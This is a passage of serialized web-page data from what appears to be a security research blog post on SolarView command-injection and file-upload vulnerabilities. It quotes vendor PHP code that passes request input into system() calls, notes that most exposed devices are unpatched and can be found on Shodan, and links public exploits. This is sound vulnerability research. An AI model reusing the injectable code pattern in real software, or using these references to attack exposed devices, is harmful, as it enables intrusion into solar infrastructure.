",[1373,93493,5417],{"class":1397},[1373,93495,4656],{"class":1383},[1373,93497,93470],{"class":4640},[1373,93499,7035],{"class":1383},[1373,93501,1388],{"class":1387},[1373,93503,93477],{"class":1391},[1373,93505,1388],{"class":1387},[1373,93507,34699],{"class":1383},[1373,93509,93510,93512,93515,93517,93519,93521,93523,93525,93528,93530],{"class":1375,"line":1266},[1373,93511,4656],{"class":1383},[1373,93513,93514],{"class":4640},"mail_address ",[1373,93516,5417],{"class":1397},[1373,93518,4656],{"class":1383},[1373,93520,93470],{"class":4640},[1373,93522,7035],{"class":1383},[1373,93524,1388],{"class":1387},[1373,93526,93527],{"class":1391},"mail_address",[1373,93529,1388],{"class":1387},[1373,93531,34699],{"class":1383},[1373,93533,93534],{"class":1375,"line":1852},[1373,93535,1855],{"class":1383},[1373,93537,93538,93541,93543,93545,93548,93550],{"class":1375,"line":4692},[1373,93539,93540],{"class":4636},"include",[1373,93542,1384],{"class":1383},[1373,93544,183],{"class":1387},[1373,93546,93547],{"class":1391},"include\u002FShowMsg.func",[1373,93549,183],{"class":1387},[1373,93551,4680],{"class":1383},[1373,93553,93554,93556,93558,93560,93563,93565],{"class":1375,"line":4724},[1373,93555,93540],{"class":4636},[1373,93557,1384],{"class":1383},[1373,93559,183],{"class":1387},[1373,93561,93562],{"class":1391},"include\u002Fcommon.def",[1373,93564,183],{"class":1387},[1373,93566,4680],{"class":1383},[1373,93568,93569,93571,93574,93576,93578,93581,93583],{"class":1375,"line":4756},[1373,93570,4644],{"class":1383},[1373,93572,93573],{"class":4640},"TestMailLog ",[1373,93575,5417],{"class":1397},[1373,93577,4883],{"class":1387},[1373,93579,93580],{"class":1391},"\u002Fvar\u002Flog\u002FSMail_test.log",[1373,93582,183],{"class":1387},[1373,93584,4912],{"class":1383},[1373,93586,93587,93589,93592,93594,93596,93599,93601,93603,93606,93608],{"class":1375,"line":4768},[1373,93588,4644],{"class":1383},[1373,93590,93591],{"class":4640},"CONFFILE ",[1373,93593,5417],{"class":1397},[1373,93595,4656],{"class":1383},[1373,93597,93598],{"class":4640},"ConfDataDir",[1373,93600,59],{"class":1397},[1373,93602,183],{"class":1387},[1373,93604,93605],{"class":1391},"\u002Ffws_mail.conf",[1373,93607,183],{"class":1387},[1373,93609,4912],{"class":1383},[1373,93611,93612],{"class":1375,"line":4792},[1373,93613,6520],{"emptyLinePlaceholder":237},[1373,93615,93616,93618,93620,93622,93624,93626,93628,93631],{"class":1375,"line":4798},[1373,93617,4637],{"class":4636},[1373,93619,1384],{"class":1383},[1373,93621,4656],{"class":1383},[1373,93623,93491],{"class":4640},[1373,93625,15920],{"class":1397},[1373,93627,4656],{"class":1383},[1373,93629,93630],{"class":4640},"LABEL_SENDEXEC ",[1373,93632,47430],{"class":1383},[1373,93634,93635,93637,93639,93641,93643,93645,93647,93649,93651,93653,93655,93657,93659],{"class":1375,"line":4806},[1373,93636,7362],{"class":1383},[1373,93638,93514],{"class":4640},[1373,93640,5417],{"class":1397},[1373,93642,34816],{"class":1379},[1373,93644,1384],{"class":1383},[1373,93646,4883],{"class":1387},[1373,93648,4883],{"class":1387},[1373,93650,5437],{"class":1383},[1373,93652,7083],{"class":1387},[1373,93654,5437],{"class":1383},[1373,93656,4656],{"class":1383},[1373,93658,93514],{"class":4640},[1373,93660,4680],{"class":1383},[1373,93662,93663,93665,93667,93670,93672,93674,93676,93678,93680],{"class":1375,"line":4817},[1373,93664,4695],{"class":4636},[1373,93666,1384],{"class":1383},[1373,93668,93669],{"class":1379}," strlen",[1373,93671,34467],{"class":1383},[1373,93673,93527],{"class":4640},[1373,93675,2230],{"class":1383},[1373,93677,11741],{"class":1397},[1373,93679,55838],{"class":5467},[1373,93681,93484],{"class":1383},[1373,93683,93684,93686,93689,93691,93693,93696,93698],{"class":1375,"line":4825},[1373,93685,35280],{"class":1383},[1373,93687,93688],{"class":4640},"sendmes ",[1373,93690,5417],{"class":1397},[1373,93692,4883],{"class":1387},[1373,93694,93695],{"class":1391},"SolarView",[1373,93697,183],{"class":1387},[1373,93699,4912],{"class":1383},[1373,93701,93702,93704,93707,93709,93711,93714,93716,93718,93720,93722,93724,93726,93729,93731,93734,93737,93739],{"class":1375,"line":4835},[1373,93703,35280],{"class":1383},[1373,93705,93706],{"class":4640},"exec_cmd ",[1373,93708,5417],{"class":1397},[1373,93710,4883],{"class":1387},[1373,93712,93713],{"class":1391},"echo -1 ",[1373,93715,183],{"class":1387},[1373,93717,59],{"class":1397},[1373,93719,4644],{"class":1383},[1373,93721,93527],{"class":4640},[1373,93723,59],{"class":1397},[1373,93725,183],{"class":1387},[1373,93727,93728],{"class":1391}," TEST-MAIL '",[1373,93730,4644],{"class":1383},[1373,93732,93733],{"class":4640},"sendmes",[1373,93735,93736],{"class":1391},"' > \u002Fdev\u002Felogparam",[1373,93738,183],{"class":1387},[1373,93740,4912],{"class":1383},[1373,93742,93743,93746,93748,93750,93752],{"class":1375,"line":4843},[1373,93744,93745],{"class":1379}," system",[1373,93747,1384],{"class":1383},[1373,93749,4656],{"class":1383},[1373,93751,93706],{"class":4640},[1373,93753,4680],{"class":1383},[1373,93755,93756,93758,93760,93762,93764],{"class":1375,"line":4849},[1373,93757,35280],{"class":1383},[1373,93759,47671],{"class":4640},[1373,93761,5417],{"class":1397},[1373,93763,5499],{"class":5467},[1373,93765,4912],{"class":1383},[1373,93767,93768],{"class":1375,"line":4877},[1373,93769,4795],{"class":1383},[1373,93771,93772,93774],{"class":1375,"line":4915},[1373,93773,7643],{"class":4636},[1373,93775,8904],{"class":1383},[1373,93777,93778,93780,93782,93784,93786],{"class":1375,"line":4931},[1373,93779,35280],{"class":1383},[1373,93781,47671],{"class":4640},[1373,93783,5417],{"class":1397},[1373,93785,55838],{"class":5467},[1373,93787,4912],{"class":1383},[1373,93789,93790],{"class":1375,"line":4947},[1373,93791,4795],{"class":1383},[1373,93793,93794],{"class":1375,"line":4952},[1373,93795,1855],{"class":1383},[18,93797,93798,93799,93801,93802,93805,93806,93809],{},"It wasn’t until version 8.00 that ",[886,93800,93444],{}," was added to the ",[886,93803,93804],{},"auth.require"," list, and validation is added to the attacker-controlled ",[886,93807,93808],{},"$mail_address"," variable.",[1354,93811,93813],{"className":1367,"code":93812,"language":1369,"meta":219,"style":219},"if( isset($_REQUEST['button']) ){\n $button = $_REQUEST['button'];\n $mail_address = EscStr($_REQUEST['mail_address']);\n $mail_address = str_replace(\" \",\"\",$mail_address);\n $address_array = explode(\",\", $mail_address);\n $mail_address = \"\";\n $cnt = 0;\n for( $i = 0 ; $i \u003C sizeof($address_array) ; $i++ ){\n if( filter_var($address_array[$i], FILTER_VALIDATE_EMAIL) ){\n if( $cnt == 0 ){\n $mail_address = $address_array[$i];\n }\n else{\n $mail_address .= \",\".$address_array[$i];\n }\n $cnt++;\n }\n }\n}\n",[886,93814,93815,93839,93861,93886,93912,93940,93952,93965,94009,94036,94052,94070,94074,94081,94107,94111,94123,94128,94132],{"__ignoreMap":219},[1373,93816,93817,93819,93821,93823,93825,93827,93829,93831,93833,93835,93837],{"class":1375,"line":1376},[1373,93818,4637],{"class":4636},[1373,93820,1384],{"class":1383},[1373,93822,93465],{"class":1379},[1373,93824,34467],{"class":1383},[1373,93826,93470],{"class":4640},[1373,93828,7035],{"class":1383},[1373,93830,1388],{"class":1387},[1373,93832,93477],{"class":1391},[1373,93834,1388],{"class":1387},[1373,93836,48026],{"class":1383},[1373,93838,93484],{"class":1383},[1373,93840,93841,93843,93845,93847,93849,93851,93853,93855,93857,93859],{"class":1375,"line":220},[1373,93842,7362],{"class":1383},[1373,93844,93491],{"class":4640},[1373,93846,5417],{"class":1397},[1373,93848,4656],{"class":1383},[1373,93850,93470],{"class":4640},[1373,93852,7035],{"class":1383},[1373,93854,1388],{"class":1387},[1373,93856,93477],{"class":1391},[1373,93858,1388],{"class":1387},[1373,93860,34699],{"class":1383},[1373,93862,93863,93865,93867,93869,93872,93874,93876,93878,93880,93882,93884],{"class":1375,"line":1266},[1373,93864,7362],{"class":1383},[1373,93866,93514],{"class":4640},[1373,93868,5417],{"class":1397},[1373,93870,93871],{"class":7297}," EscStr",[1373,93873,34467],{"class":1383},[1373,93875,93470],{"class":4640},[1373,93877,7035],{"class":1383},[1373,93879,1388],{"class":1387},[1373,93881,93527],{"class":1391},[1373,93883,1388],{"class":1387},[1373,93885,34850],{"class":1383},[1373,93887,93888,93890,93892,93894,93896,93898,93900,93902,93904,93906,93908,93910],{"class":1375,"line":1852},[1373,93889,7362],{"class":1383},[1373,93891,93514],{"class":4640},[1373,93893,5417],{"class":1397},[1373,93895,34816],{"class":1379},[1373,93897,1384],{"class":1383},[1373,93899,183],{"class":1387},[1373,93901,4883],{"class":1387},[1373,93903,5437],{"class":1383},[1373,93905,7083],{"class":1387},[1373,93907,47335],{"class":1383},[1373,93909,93527],{"class":4640},[1373,93911,4680],{"class":1383},[1373,93913,93914,93916,93919,93921,93924,93926,93928,93930,93932,93934,93936,93938],{"class":1375,"line":4692},[1373,93915,7362],{"class":1383},[1373,93917,93918],{"class":4640},"address_array ",[1373,93920,5417],{"class":1397},[1373,93922,93923],{"class":1379}," explode",[1373,93925,1384],{"class":1383},[1373,93927,183],{"class":1387},[1373,93929,5437],{"class":1391},[1373,93931,183],{"class":1387},[1373,93933,5437],{"class":1383},[1373,93935,4656],{"class":1383},[1373,93937,93527],{"class":4640},[1373,93939,4680],{"class":1383},[1373,93941,93942,93944,93946,93948,93950],{"class":1375,"line":4724},[1373,93943,7362],{"class":1383},[1373,93945,93514],{"class":4640},[1373,93947,5417],{"class":1397},[1373,93949,16579],{"class":1387},[1373,93951,4912],{"class":1383},[1373,93953,93954,93956,93959,93961,93963],{"class":1375,"line":4756},[1373,93955,7362],{"class":1383},[1373,93957,93958],{"class":4640},"cnt ",[1373,93960,5417],{"class":1397},[1373,93962,5557],{"class":5467},[1373,93964,4912],{"class":1383},[1373,93966,93967,93969,93971,93973,93976,93978,93980,93982,93984,93986,93988,93991,93993,93996,93998,94000,94002,94004,94007],{"class":1375,"line":4768},[1373,93968,63770],{"class":4636},[1373,93970,1384],{"class":1383},[1373,93972,4656],{"class":1383},[1373,93974,93975],{"class":4640},"i ",[1373,93977,5417],{"class":1397},[1373,93979,5557],{"class":5467},[1373,93981,57171],{"class":1383},[1373,93983,4656],{"class":1383},[1373,93985,93975],{"class":4640},[1373,93987,11852],{"class":1397},[1373,93989,93990],{"class":1379}," sizeof",[1373,93992,34467],{"class":1383},[1373,93994,93995],{"class":4640},"address_array",[1373,93997,2230],{"class":1383},[1373,93999,57171],{"class":1383},[1373,94001,4656],{"class":1383},[1373,94003,49188],{"class":4640},[1373,94005,94006],{"class":1397},"++",[1373,94008,93484],{"class":1383},[1373,94010,94011,94013,94015,94018,94020,94022,94025,94027,94029,94032,94034],{"class":1375,"line":4792},[1373,94012,78732],{"class":4636},[1373,94014,1384],{"class":1383},[1373,94016,94017],{"class":1379}," filter_var",[1373,94019,34467],{"class":1383},[1373,94021,93995],{"class":4640},[1373,94023,94024],{"class":1383},"[$",[1373,94026,49188],{"class":4640},[1373,94028,27625],{"class":1383},[1373,94030,94031],{"class":52039}," FILTER_VALIDATE_EMAIL",[1373,94033,2230],{"class":1383},[1373,94035,93484],{"class":1383},[1373,94037,94038,94040,94042,94044,94046,94048,94050],{"class":1375,"line":4798},[1373,94039,27350],{"class":4636},[1373,94041,1384],{"class":1383},[1373,94043,4656],{"class":1383},[1373,94045,93958],{"class":4640},[1373,94047,15920],{"class":1397},[1373,94049,5557],{"class":5467},[1373,94051,93484],{"class":1383},[1373,94053,94054,94056,94058,94060,94062,94064,94066,94068],{"class":1375,"line":4806},[1373,94055,34534],{"class":1383},[1373,94057,93514],{"class":4640},[1373,94059,5417],{"class":1397},[1373,94061,4656],{"class":1383},[1373,94063,93995],{"class":4640},[1373,94065,94024],{"class":1383},[1373,94067,49188],{"class":4640},[1373,94069,34699],{"class":1383},[1373,94071,94072],{"class":1375,"line":4817},[1373,94073,27810],{"class":1383},[1373,94075,94076,94079],{"class":1375,"line":4825},[1373,94077,94078],{"class":4636}," else",[1373,94080,8904],{"class":1383},[1373,94082,94083,94085,94087,94089,94091,94093,94095,94097,94099,94101,94103,94105],{"class":1375,"line":4835},[1373,94084,34534],{"class":1383},[1373,94086,93514],{"class":4640},[1373,94088,34739],{"class":1397},[1373,94090,4883],{"class":1387},[1373,94092,5437],{"class":1391},[1373,94094,183],{"class":1387},[1373,94096,59],{"class":1397},[1373,94098,4644],{"class":1383},[1373,94100,93995],{"class":4640},[1373,94102,94024],{"class":1383},[1373,94104,49188],{"class":4640},[1373,94106,34699],{"class":1383},[1373,94108,94109],{"class":1375,"line":4843},[1373,94110,27810],{"class":1383},[1373,94112,94113,94116,94119,94121],{"class":1375,"line":4849},[1373,94114,94115],{"class":1383}," $",[1373,94117,94118],{"class":4640},"cnt",[1373,94120,94006],{"class":1397},[1373,94122,4912],{"class":1383},[1373,94124,94125],{"class":1375,"line":4877},[1373,94126,94127],{"class":1383}," }\n",[1373,94129,94130],{"class":1375,"line":4915},[1373,94131,4795],{"class":1383},[1373,94133,94134],{"class":1375,"line":4931},[1373,94135,1855],{"class":1383},[18,94137,94138],{},"Suffice to say, the range of affected systems is much wider than the CVE description lets on, and thanks to a copyright string on the landing page (and the sparse amount of releases over the years), we can easily fingerprint the affected internet-facing systems.",[18,94140,94141],{},[68,94142],{":width":10862,"alt":94143,"src":94144},"Vulnerable SolarView instances on Shodan","\u002Fblog\u002Fsolarview-exploitation\u002Fshodan-affected.png",[18,94146,94147],{},"It turns out that less than one third of the internet-facing SolarView series systems are patched against CVE-2022-29303.",[18,94149,94150,94151,94156,94157,94162,94163,94168],{},"Additionally, Unit 42’s blog wasn’t even the first indication that the vulnerability was being exploited in the wild. CVE-2022-29303 has had an ",[47,94152,94155],{"href":94153,"rel":94154},"https:\u002F\u002Fwww.exploit-db.com\u002Fexploits\u002F50940",[51],"Exploit-DB entry"," since May 2022. GreyNoise ",[47,94158,94161],{"href":94159,"rel":94160},"https:\u002F\u002Fwww.greynoise.io\u002Fblog\u002Ftrinity-cyber-sharing-intelligence-protect-internet-citizens",[51],"mentioned"," the vulnerability in a blog in May 2023. And a ",[47,94164,94167],{"href":94165,"rel":94166},"https:\u002F\u002Fwww.youtube.com\u002Fwatch?v=vFo1XETreCs",[51],"YouTube video"," from May 2022 shows an attacker using the Exploit-DB exploit against a SolarView system found on Shodan (why one would post their crimes to YouTube, I’ll never know).",[18,94170,94171],{},[68,94172],{":width":10862,"alt":94173,"src":94174},"Exploitation of SolarView on YouTube","\u002Fblog\u002Fsolarview-exploitation\u002Fyoutube-crimes.png",[18,94176,94177],{},"It gets worse. While CVE-2022-29303 has garnered attention from some organizations like Unit 42 and GreyNoise, there are a couple of other unauthenticated RCEs affecting the systems that have not.",[18,94179,24052,94180,94185,94186,10515,94190,94194,94195,59],{},[47,94181,94184],{"href":94182,"rel":94183},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2023-23333",[51],"CVE-2023-23333"," affects the SolarView series up to version 8.00 (despite the fact that the CVE description says “through 6.0”). This vulnerability doesn’t have any Exploit-DB entries, but it has ",[47,94187,29823],{"href":94188,"rel":94189},"https:\u002F\u002Fgithub.com\u002FTimorlover\u002FCVE-2023-23333",[51],[47,94191,25091],{"href":94192,"rel":94193},"https:\u002F\u002Fgithub.com\u002FMr-xn\u002FCVE-2023-23333",[51]," on ",[47,94196,2485],{"href":94197,"rel":94198},"https:\u002F\u002Fgithub.com\u002FWhiteOwl-Pub\u002FPoC-SolarView-Compact-CVE-2023-23333",[51],[18,94200,94201],{},[68,94202],{":width":10862,"alt":94203,"src":94204},"downloader.php exploit","\u002Fblog\u002Fsolarview-exploitation\u002Fdownloader-exploit.png",[18,94206,94207,94208,94211,94212,94215],{},"CVE-2023-23333 is a simple command injection affecting the ",[886,94209,94210],{},"downloader.php"," endpoint (specifically mishandling of user data in the ",[886,94213,94214],{},"zip"," case).",[1354,94217,94219],{"className":1367,"code":94218,"language":1369,"meta":219,"style":219},"if( isset($_REQUEST['file']) ){\n $file = $_REQUEST['file'];\n}\nfunction get_extend( $filename ){\n $pos = strrpos( $filename, \".\" );\n return substr( $filename, $pos );\n}\n$ext = get_extend( $file );\nswitch( $ext ){\ncase \".csv\":\n break;\ncase \".jpg\":\ncase \".jpeg\":\ncase \".JPG\":\ncase \".JPEG\":\ncase \".Jpeg\":\ncase \".Jpg\":\ncase \".gif\":\ncase \".GIF\":\ncase \".Gif\":\n $path = \"\u002Fhome\u002Fwww\u002Fhtml\u002Fimages\u002F\";\n break;\ncase \".zip\":\n $ARCH_FILE = sprintf(\"\u002Fhome\u002Fcontec\u002Fdata\u002F%s\", $file);\n if( file_exists($ARCH_FILE) ){\n unlink($ARCH_FILE);\n }\n $cmd = sprintf(\"\u002Fusr\u002Flocal\u002Fbin\u002Fdata_zip.sh %s > \u002Fdev\u002Fnull\", basename($ARCH_FILE));\n system($cmd);\n $file = $ARCH_FILE;\n break;\n}\n",[886,94220,94221,94245,94268,94272,94288,94317,94339,94343,94361,94374,94388,94395,94408,94421,94434,94447,94460,94473,94486,94499,94512,94530,94536,94549,94578,94596,94607,94611,94641,94651,94665,94671],{"__ignoreMap":219},[1373,94222,94223,94225,94227,94229,94231,94233,94235,94237,94239,94241,94243],{"class":1375,"line":1376},[1373,94224,4637],{"class":4636},[1373,94226,1384],{"class":1383},[1373,94228,93465],{"class":1379},[1373,94230,34467],{"class":1383},[1373,94232,93470],{"class":4640},[1373,94234,7035],{"class":1383},[1373,94236,1388],{"class":1387},[1373,94238,85692],{"class":1391},[1373,94240,1388],{"class":1387},[1373,94242,48026],{"class":1383},[1373,94244,93484],{"class":1383},[1373,94246,94247,94249,94252,94254,94256,94258,94260,94262,94264,94266],{"class":1375,"line":220},[1373,94248,4656],{"class":1383},[1373,94250,94251],{"class":4640},"file ",[1373,94253,5417],{"class":1397},[1373,94255,4656],{"class":1383},[1373,94257,93470],{"class":4640},[1373,94259,7035],{"class":1383},[1373,94261,1388],{"class":1387},[1373,94263,85692],{"class":1391},[1373,94265,1388],{"class":1387},[1373,94267,34699],{"class":1383},[1373,94269,94270],{"class":1375,"line":1266},[1373,94271,1855],{"class":1383},[1373,94273,94274,94276,94279,94281,94283,94286],{"class":1375,"line":1852},[1373,94275,8560],{"class":7293},[1373,94277,94278],{"class":7297}," get_extend",[1373,94280,1384],{"class":1383},[1373,94282,4656],{"class":1383},[1373,94284,94285],{"class":4640},"filename ",[1373,94287,47430],{"class":1383},[1373,94289,94290,94292,94295,94297,94300,94302,94304,94306,94308,94310,94312,94314],{"class":1375,"line":4692},[1373,94291,4656],{"class":1383},[1373,94293,94294],{"class":4640},"pos ",[1373,94296,5417],{"class":1397},[1373,94298,94299],{"class":1379}," strrpos",[1373,94301,1384],{"class":1383},[1373,94303,4656],{"class":1383},[1373,94305,9588],{"class":4640},[1373,94307,5437],{"class":1383},[1373,94309,4883],{"class":1387},[1373,94311,59],{"class":1391},[1373,94313,183],{"class":1387},[1373,94315,94316],{"class":1383}," );\n",[1373,94318,94319,94322,94325,94327,94329,94331,94333,94335,94337],{"class":1375,"line":4724},[1373,94320,94321],{"class":4636}," return",[1373,94323,94324],{"class":1379}," substr",[1373,94326,1384],{"class":1383},[1373,94328,4656],{"class":1383},[1373,94330,9588],{"class":4640},[1373,94332,5437],{"class":1383},[1373,94334,4656],{"class":1383},[1373,94336,94294],{"class":4640},[1373,94338,4680],{"class":1383},[1373,94340,94341],{"class":1375,"line":4756},[1373,94342,1855],{"class":1383},[1373,94344,94345,94347,94349,94351,94353,94355,94357,94359],{"class":1375,"line":4768},[1373,94346,4644],{"class":1383},[1373,94348,66754],{"class":4640},[1373,94350,5417],{"class":1397},[1373,94352,94278],{"class":7297},[1373,94354,1384],{"class":1383},[1373,94356,4656],{"class":1383},[1373,94358,94251],{"class":4640},[1373,94360,4680],{"class":1383},[1373,94362,94363,94366,94368,94370,94372],{"class":1375,"line":4792},[1373,94364,94365],{"class":4636},"switch",[1373,94367,1384],{"class":1383},[1373,94369,4656],{"class":1383},[1373,94371,66754],{"class":4640},[1373,94373,47430],{"class":1383},[1373,94375,94376,94379,94381,94384,94386],{"class":1375,"line":4798},[1373,94377,94378],{"class":4636},"case",[1373,94380,4883],{"class":1387},[1373,94382,94383],{"class":1391},".csv",[1373,94385,183],{"class":1387},[1373,94387,11747],{"class":1383},[1373,94389,94390,94393],{"class":1375,"line":4806},[1373,94391,94392],{"class":4636}," break",[1373,94394,4912],{"class":1383},[1373,94396,94397,94399,94401,94404,94406],{"class":1375,"line":4817},[1373,94398,94378],{"class":4636},[1373,94400,4883],{"class":1387},[1373,94402,94403],{"class":1391},".jpg",[1373,94405,183],{"class":1387},[1373,94407,11747],{"class":1383},[1373,94409,94410,94412,94414,94417,94419],{"class":1375,"line":4825},[1373,94411,94378],{"class":4636},[1373,94413,4883],{"class":1387},[1373,94415,94416],{"class":1391},".jpeg",[1373,94418,183],{"class":1387},[1373,94420,11747],{"class":1383},[1373,94422,94423,94425,94427,94430,94432],{"class":1375,"line":4835},[1373,94424,94378],{"class":4636},[1373,94426,4883],{"class":1387},[1373,94428,94429],{"class":1391},".JPG",[1373,94431,183],{"class":1387},[1373,94433,11747],{"class":1383},[1373,94435,94436,94438,94440,94443,94445],{"class":1375,"line":4843},[1373,94437,94378],{"class":4636},[1373,94439,4883],{"class":1387},[1373,94441,94442],{"class":1391},".JPEG",[1373,94444,183],{"class":1387},[1373,94446,11747],{"class":1383},[1373,94448,94449,94451,94453,94456,94458],{"class":1375,"line":4849},[1373,94450,94378],{"class":4636},[1373,94452,4883],{"class":1387},[1373,94454,94455],{"class":1391},".Jpeg",[1373,94457,183],{"class":1387},[1373,94459,11747],{"class":1383},[1373,94461,94462,94464,94466,94469,94471],{"class":1375,"line":4877},[1373,94463,94378],{"class":4636},[1373,94465,4883],{"class":1387},[1373,94467,94468],{"class":1391},".Jpg",[1373,94470,183],{"class":1387},[1373,94472,11747],{"class":1383},[1373,94474,94475,94477,94479,94482,94484],{"class":1375,"line":4915},[1373,94476,94378],{"class":4636},[1373,94478,4883],{"class":1387},[1373,94480,94481],{"class":1391},".gif",[1373,94483,183],{"class":1387},[1373,94485,11747],{"class":1383},[1373,94487,94488,94490,94492,94495,94497],{"class":1375,"line":4931},[1373,94489,94378],{"class":4636},[1373,94491,4883],{"class":1387},[1373,94493,94494],{"class":1391},".GIF",[1373,94496,183],{"class":1387},[1373,94498,11747],{"class":1383},[1373,94500,94501,94503,94505,94508,94510],{"class":1375,"line":4947},[1373,94502,94378],{"class":4636},[1373,94504,4883],{"class":1387},[1373,94506,94507],{"class":1391},".Gif",[1373,94509,183],{"class":1387},[1373,94511,11747],{"class":1383},[1373,94513,94514,94516,94519,94521,94523,94526,94528],{"class":1375,"line":4952},[1373,94515,4656],{"class":1383},[1373,94517,94518],{"class":4640},"path ",[1373,94520,5417],{"class":1397},[1373,94522,4883],{"class":1387},[1373,94524,94525],{"class":1391},"\u002Fhome\u002Fwww\u002Fhtml\u002Fimages\u002F",[1373,94527,183],{"class":1387},[1373,94529,4912],{"class":1383},[1373,94531,94532,94534],{"class":1375,"line":6776},[1373,94533,94392],{"class":4636},[1373,94535,4912],{"class":1383},[1373,94537,94538,94540,94542,94545,94547],{"class":1375,"line":6781},[1373,94539,94378],{"class":4636},[1373,94541,4883],{"class":1387},[1373,94543,94544],{"class":1391},".zip",[1373,94546,183],{"class":1387},[1373,94548,11747],{"class":1383},[1373,94550,94551,94553,94556,94558,94561,94563,94565,94568,94570,94572,94574,94576],{"class":1375,"line":7524},[1373,94552,4656],{"class":1383},[1373,94554,94555],{"class":4640},"ARCH_FILE ",[1373,94557,5417],{"class":1397},[1373,94559,94560],{"class":1379}," sprintf",[1373,94562,1384],{"class":1383},[1373,94564,183],{"class":1387},[1373,94566,94567],{"class":1391},"\u002Fhome\u002Fcontec\u002Fdata\u002F%s",[1373,94569,183],{"class":1387},[1373,94571,5437],{"class":1383},[1373,94573,4656],{"class":1383},[1373,94575,85692],{"class":4640},[1373,94577,4680],{"class":1383},[1373,94579,94580,94582,94584,94587,94589,94592,94594],{"class":1375,"line":7530},[1373,94581,7483],{"class":4636},[1373,94583,1384],{"class":1383},[1373,94585,94586],{"class":1379}," file_exists",[1373,94588,34467],{"class":1383},[1373,94590,94591],{"class":4640},"ARCH_FILE",[1373,94593,2230],{"class":1383},[1373,94595,93484],{"class":1383},[1373,94597,94598,94601,94603,94605],{"class":1375,"line":7546},[1373,94599,94600],{"class":1379}," unlink",[1373,94602,34467],{"class":1383},[1373,94604,94591],{"class":4640},[1373,94606,4680],{"class":1383},[1373,94608,94609],{"class":1375,"line":7571},[1373,94610,35334],{"class":1383},[1373,94612,94613,94615,94617,94619,94621,94623,94625,94628,94630,94632,94635,94637,94639],{"class":1375,"line":7598},[1373,94614,4656],{"class":1383},[1373,94616,75150],{"class":4640},[1373,94618,5417],{"class":1397},[1373,94620,94560],{"class":1379},[1373,94622,1384],{"class":1383},[1373,94624,183],{"class":1387},[1373,94626,94627],{"class":1391},"\u002Fusr\u002Flocal\u002Fbin\u002Fdata_zip.sh %s > \u002Fdev\u002Fnull",[1373,94629,183],{"class":1387},[1373,94631,5437],{"class":1383},[1373,94633,94634],{"class":1379}," basename",[1373,94636,34467],{"class":1383},[1373,94638,94591],{"class":4640},[1373,94640,1413],{"class":1383},[1373,94642,94643,94645,94647,94649],{"class":1375,"line":7615},[1373,94644,87603],{"class":1379},[1373,94646,34467],{"class":1383},[1373,94648,17653],{"class":4640},[1373,94650,4680],{"class":1383},[1373,94652,94653,94655,94657,94659,94661,94663],{"class":1375,"line":7635},[1373,94654,4656],{"class":1383},[1373,94656,94251],{"class":4640},[1373,94658,5417],{"class":1397},[1373,94660,4656],{"class":1383},[1373,94662,94591],{"class":4640},[1373,94664,4912],{"class":1383},[1373,94666,94667,94669],{"class":1375,"line":7640},[1373,94668,94392],{"class":4636},[1373,94670,4912],{"class":1383},[1373,94672,94673],{"class":1375,"line":7648},[1373,94674,1855],{"class":1383},[18,94676,94677,94678,94683,94684,94689,94690,94695,94696,94699],{},"The SolarView Series is also affected by ",[47,94679,94682],{"href":94680,"rel":94681},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-44354",[51],"CVE-2022-44354",", a file upload vulnerability that allows an attacker to ",[47,94685,94688],{"href":94686,"rel":94687},"https:\u002F\u002Fgithub.com\u002Fstrik3r0x1\u002FVulns\u002Fblob\u002Fmain\u002FUnrestricted%20File%20Upload_%20SolarView%20Compact%204.0%2C5.0.md",[51],"upload"," a PHP webshell to the system. The CVE description says “Compact 4.0 and 5.0” are affected, but there’s a duplicate CVE (",[47,94691,94694],{"href":94692,"rel":94693},"https:\u002F\u002Fnvd.nist.gov\u002Fvuln\u002Fdetail\u002FCVE-2022-31374",[51],"CVE-2022-31374",") that says Compact 6.0 is affected. Either way, we see no changes to ",[886,94697,94698],{},"\u002FSolar_Image.php"," (the affected component) until version 7.0.",[1354,94701,94703],{"className":1367,"code":94702,"language":1369,"meta":219,"style":219},"- else if( $img_type \u003C 0 || 3 \u003C $img_type ){\n+ else if( $img_type \u003C= 0 || 3 \u003C $img_type ){\n echo \"JPEG”;\n }\n else{\n- copy( $userfile, $IMG_PATH.\"\u002F\".basename($userfile_name));\n- echo urldecode($userfile_name).\"\u003CBR>\\n\";\n- chmod( $IMG_PATH.\"\u002F\".basename($userfile_name), 0666 );\n- echo $MSG_SEND_OK.\"\\n\";\n+ $cmd = sprintf(\"\u002Fusr\u002Fbin\u002Ffile %s | awk '{print $2}'\",$userfile );\n+ $img_type = exec( $cmd);\n+ if( $img_type == \"GIF\" || $img_type == \"PNG\" || $img_type == \"JPG\" || $img_type == \"JPEG\" ){\n+ copy( $userfile, $IMG_PATH.\"\u002F\".basename($userfile_name));\n+ echo urldecode($userfile_name).\"\u003CBR>\\n\";\n+ chmod( $IMG_PATH.\"\u002F\".basename($userfile_name), 0666 );\n+ echo $MSG_SEND_OK.\"\\n\";\n+ }\n",[886,94704,94705,94737,94768,94778,94782,94787,94822,94850,94876,94898,94952,94970,95037,95068,95095,95120,95141],{"__ignoreMap":219},[1373,94706,94707,94709,94712,94714,94716,94718,94721,94723,94725,94727,94729,94731,94733,94735],{"class":1375,"line":1376},[1373,94708,61062],{"class":1397},[1373,94710,94711],{"class":4636}," else",[1373,94713,7483],{"class":4636},[1373,94715,1384],{"class":1383},[1373,94717,4656],{"class":1383},[1373,94719,94720],{"class":4640},"img_type ",[1373,94722,11852],{"class":1397},[1373,94724,5557],{"class":5467},[1373,94726,2219],{"class":1397},[1373,94728,55838],{"class":5467},[1373,94730,27250],{"class":1397},[1373,94732,4656],{"class":1383},[1373,94734,94720],{"class":4640},[1373,94736,47430],{"class":1383},[1373,94738,94739,94741,94743,94745,94747,94749,94751,94754,94756,94758,94760,94762,94764,94766],{"class":1375,"line":220},[1373,94740,15448],{"class":1397},[1373,94742,94711],{"class":4636},[1373,94744,7483],{"class":4636},[1373,94746,1384],{"class":1383},[1373,94748,4656],{"class":1383},[1373,94750,94720],{"class":4640},[1373,94752,94753],{"class":1397},"\u003C=",[1373,94755,5557],{"class":5467},[1373,94757,2219],{"class":1397},[1373,94759,55838],{"class":5467},[1373,94761,27250],{"class":1397},[1373,94763,4656],{"class":1383},[1373,94765,94720],{"class":4640},[1373,94767,47430],{"class":1383},[1373,94769,94770,94773,94775],{"class":1375,"line":1266},[1373,94771,94772],{"class":1379}," 